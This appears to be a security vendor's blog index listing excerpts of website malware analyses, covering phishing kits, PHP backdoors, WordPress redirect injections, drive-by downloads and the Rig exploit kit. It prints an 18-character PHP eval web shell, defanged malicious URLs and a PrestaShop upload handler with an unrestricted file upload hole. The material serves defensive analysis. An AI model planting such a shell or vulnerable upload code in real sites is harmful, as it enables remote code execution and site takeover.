Introduction During recent phishing incident handled by ThreatSign incident response team, a phishing link lead to a discovery of the Phishing Kit. The prompt actions allowed to mitigate the threat and avoid its distribution in the wild. Let's skip the attack background and head to the Phish Kit details: Office 365 PhishKit MD5: b46a0a1035e49e2e9e0218ebbd97fffe The file is a zipped file that contains the whole directory of the phishing kit. Upon loading the files on a web server it shows a familiar Office 365 login page: Upon entering fictional credentials, the fake Office login page made the following requests:
Read more →
Introduction Typically, Backdoor malware is one of the initial stages of the cyber attack. Hackers find vulnerabilities on the site and upload arbitrary files (in this case a Backdoor) to your site and then access it via browser. This is how a plain old Backdoor looks like: For more information about a Backdoor: FilesMan Backdoor Malware On Your Computer Using Legitimate Code Wrappers To Avoid Detection By The Web Malware Scanners The above-mentioned type of backdoor has identifiable signatures which are distributed among the security vendors and then utilized in the traditional (signature-based) detection algorithms.
Introduction In the last few days we received lots of JavaScript infection related to page redirection. One of the most common techniques is an inserted JavaScript that targets WordPress CMS. The attacker inserts the link, hxxs://traffictrade[.]life/scripts.js on each page. This link then redirects the visitors to your site to the https://redirect[.]trafficreceiver.club/landing/ where they will see the malicious pop-ups. The interesting part is, there were no infected files on customer's site. The only sign is the code injected into the 'wp_options' table inside the database.
Introduction Malicious wrongdoings are not always updated. But the attack vectors are. Hackers are constantly evolving their way of attacks. But once the infiltration succeeds they will just use good old techniques as they are already on your server and no further sophisticated obfuscation is required. We have uncovered a new malware that uses websites to perform DDoS attacks. Malicious code was uploaded to the website and run the bot to perform whatever the hacker wants it to do.
Introduction Site after site is being hacked every second that we spent on the internet. Many of these are commercial sites that involve money or sensitive information crucial to the website owner. How are these sites being hacked anyway? First and essential step in the cyber attack planning, that we already stressed in previous posts, is the security information gathering on potential victim websites. Since the majority of the commercial sites are created using CMS (Content Management System), the information on the underlying code is publicly available.
PHP is a general server-side scripting language providing very reach arsenal for web development. As a part of it, PHP provides broad capabilities to develop generic shells that can run on almost every website. In the recent website malware cleanup process we detected generic shell that occupied only 18 characters. The following is the code of this shell capable of executing any arbitrary malicious content submitted by attackers. <?php @eval($_POST[yt]); This shell has three major parts @ - PHP Error control operator making PHP interpreter to ignore any occured error (http://php.
Introduction Each automated or manual cyber attack starts with gathering as much information about the targeted website or server as possible. Usually, the first step would be the “poc scanning”, which aims to locate and identify an execution environment setup. Website owners tend to neglect the protection of such information and probably not aware of the risk accompanied. In this post, you will learn a simple technique that you can use to improve your website security.
Introduction Among the Content Management Systems (CMS) the WordPress is probably the most popular. Our statistics in the Annual Website Malware Report | 2016 show WordPress as leading CMS in 2016. Due to its popularity, it is also prone to vulnerabilities. In the same report it can be seen that 76% of our infected customers were using WordPress. What Are The Main Components Of The WordPress Installation? Each WordPress website has three main parts:
Introduction We have encountered a 5-year-old malware while cleaning up one of our customer's website. The malware used a drive-by download method to infect the users. What is Drive-by Download? The drive-by download is an attack vector wherein the users are downloading the payload without their knowledge or consent. It usually happens during the visit to an infected site, reviewing an email or by just clicking a popup advertisement. What does the payload do?
Introduction This short post is about recent attack that targets the Joomla! Content Management System's and specifically its templates. We decided that it is worth to spread the word about it after our malware experts resolved numerous similar incidents. Attack On Joomla! Templates The file index.php contains a malicious script that calls its main component like the snippet below: But if you view the site source via the web, the added script just before the head tag looks like this: Note: For stat88b.
Introduction As for the definition in CMS (Content Management System), a plugin is a collection of code files that adds one or more features to your website. After you install the core code for your CMS, you can install your choice of plugins. Depending on the nature and the design of your site, you can choose from thousands of plugins available on the internet. Our incident response team encountered one peculiar issue where the website got blacklisted for distributing adware to its visitors.
Ads has been spreading all over the internet starting from any social networking sites to almost everything. Some ads are plain and straightforward, and some are horrific and disturbing. Like this one that we got just last week. When we checked a link, it showed these images below: And it will take you to the Play Store to download an app. If you are still unaware, along with the helpful and useful apps the Google Play Store is infested with a lot of malicious apps.
Background One of the most recognizable errors encountered on the Internet is the “404 Not Found” page. The website hosting server usually generates such error when a visitor attempts to access a page that does not exist (broken or dead link). Webmasters can configure the servers to display a customized and more user-friendly 404 error page offering the sitemap, branding or other helpful information. This post shows how the hackers that broke into the web server through the compromised website exploited this mechanism to serve SPAM.
Background It is not a surprise that a Weak Password leads to a compromised website. What is not upfront obvious is the scale of the damage that could happen when such necessary security measure as a Strong Password is neglected. It is a must for every company and business to enforce strict policy for the creation and proper maintenance of the authentication details on every level and across all of the assets.
Background There is a wide blasting of SPAM emails that pretended to be a legitimate letter from Apple about your user account being used on a new device. Due to people's instinct to click on any link embedded in the email without analyzing the content, SPAM campaigns are usually very effective when disguised under a well known brand. SPAM investigation Let's take a deep look and spot the flaws of the email:
Background As it turned out during the malware clean-up of customer websites, hackers were using exactly this type of exploit to attack the site. Furthermore, the site got reinfected with malware as soon as someone accessed it. We got alarmed as the reinfection was so sudden, so we dig deeply and found out something else. Website Malware Incident Investigation Upon checking the access logs of the site, we found a very nifty but familiar entry on the records as shown below:
Background There is a Black SEO/Spam poisoning campaign running that targets mainly the WordPress websites. While handling several incidents related to it, we have discovered a new self-recovering WordPress oriented malware among other malicious components. Let’s take a look at all of them. Backdoors To Control The Attacked Website We still don’t know if there is any relation between infections but all of the examined websites contained numerous generic PHP shells and backdoors which names have the following format:
During our incident response to the client's website, we found a vulnerability in the VTEM Skitter module of Prestashop CMS. Here is the code snippet of the uploadimage.php: $uploaddir = ‘./img/’; $uploadfile = normalize(pregreplace(‘/ /’, ‘’, basename($_FILES[‘userfile’][‘name’]))); if (move_uploaded_file($_FILES[‘userfile’][‘tmp_name’], $uploaddir.$uploadfile)) echo ‘success:‘.$uploadfile; else echo ‘error’; To test if your site is vulnerable, try going to your favourite browser and enter the following in the address bar: http:///modules/vtemskitter/uploadimage.
Information has been scattered all over the internet. Links after links are being distributed over the web through Facebook, Youtube, blogs, emails, text messages and any other form of online communication. Having said that, this also includes good and bad links which can cause problems to the visitors of these links. Unpatched sites are being exploited with a lot of infected redirections and do contain payloads to attack. A couple of weeks ago, we received a report about an unauthorized connection that the site makes whenever a visitor checks it.
There is no such thing as a perfect web application. Some software vulnerabilities have been there since the very first application was created. The majority of today's exploitation can lead to the automatic execution of arbitrary codes without the users' permission. In this post, we show the Rig Exploit Kit's attack flow. Quttera's malware researchers uncovered and removed this malware for one of our ThreatSign customer websites. Rig Exploit Kit has been thunderous, and it is widely used by the hackers to distribute malware over the internet.
Get your website cleaned and removed from blacklists. Prevent traffic loss and protect your visitors now.
$249
/ yr
$149
more plans
Need help? contactus@quttera.com
Join our mailing list to receive free email updates